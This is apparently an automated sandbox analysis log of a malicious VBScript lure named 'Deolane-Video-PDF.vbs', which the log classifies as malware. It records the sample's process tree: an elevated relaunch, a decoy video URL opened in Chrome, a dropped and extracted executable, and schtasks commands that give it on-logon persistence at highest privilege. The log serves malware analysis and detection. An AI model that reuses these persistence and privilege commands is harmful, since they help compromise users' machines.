Source: api-ms-win-crt-string-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.15.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.23.dr Static PE information: No import functions for PE file found
Source: classification engine Classification label: mal100.evad.winVBS@43/171@10/7
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC17420 GetLastError,FormatMessageW,WideCharToMultiByte, 15_2_00007FF7ADC17420
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe File created: C:\Users\user\AppData\Roaming\Software Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\4wToa.zip Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Deolane-Video-PDF.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Deolane-Video-PDF.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\Deolane-Video-PDF.vbs" /elevated
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://estudosadulto.educacao.ws/deolane.mp4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2336,i,6872769781051074881,1021578343780495582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5032 --field-trial-handle=2336,i,6872769781051074881,1021578343780495582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn XHdU9gx7 /tr "C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe" /sc once /st 05:31 /RL HIGHEST /f
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /query /tn "registry_4131f52c.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "registry_4131f52c.exe"
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /create /tn "registry_4131f52c.exe" /tr "C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe" /sc onlogon /rl highest /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "registry_4131f52c.exe" /tr "C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe" /sc onlogon /rl highest /f
Source: unknown Process created: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process created: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /query /tn "registry_4131f52c.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "registry_4131f52c.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://estudosadulto.educacao.ws/deolane.mp4 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn XHdU9gx7 /tr "C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe" /sc once /st 05:31 /RL HIGHEST /f Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2336,i,6872769781051074881,1021578343780495582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5032 --field-trial-handle=2336,i,6872769781051074881,1021578343780495582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /query /tn "registry_4131f52c.exe"" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /create /tn "registry_4131f52c.exe" /tr "C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe" /sc onlogon /rl highest /f" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "registry_4131f52c.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "registry_4131f52c.exe" /tr "C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe" /sc onlogon /rl highest /f Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process created: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /query /tn "registry_4131f52c.exe"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "registry_4131f52c.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.shell.servicehostbuilder.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: zipfldr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: libffi-7.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: libffi-7.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations Jump to behavior
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318875173.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420233729.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: bOamY.exe, 0000000F.00000003.2312817260.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406050971.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: bOamY.exe, 00000010.00000002.3395178924.00007FFDA3974000.00000002.00000001.01000000.0000000B.sdmp, registry_4131f52c.exe, 00000018.00000002.3394559411.00007FFD83984000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\python3.pdb source: bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3399526152.00007FFDAC122000.00000002.00000001.01000000.0000000E.sdmp, registry_4131f52c.exe, 00000017.00000003.2427026247.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3399419457.00007FFDA5522000.00000002.00000001.01000000.00000023.sdmp, python3.dll.23.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2311807566.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405381148.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb source: pywintypes38.dll.23.dr, pywintypes38.dll.15.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316950781.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417424650.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317942434.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419322035.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: C:\A\31\b\bin\amd64\_bz2.pdb source: bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3398622868.00007FFDA5BAE000.00000002.00000001.01000000.00000011.sdmp, registry_4131f52c.exe, 00000017.00000003.2399145620.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3398060862.00007FFDA546E000.00000002.00000001.01000000.00000026.sdmp, _bz2.pyd.23.dr
Source: Binary string: C:\A\31\b\bin\amd64\_multiprocessing.pdb source: bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2401033777.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.23.dr
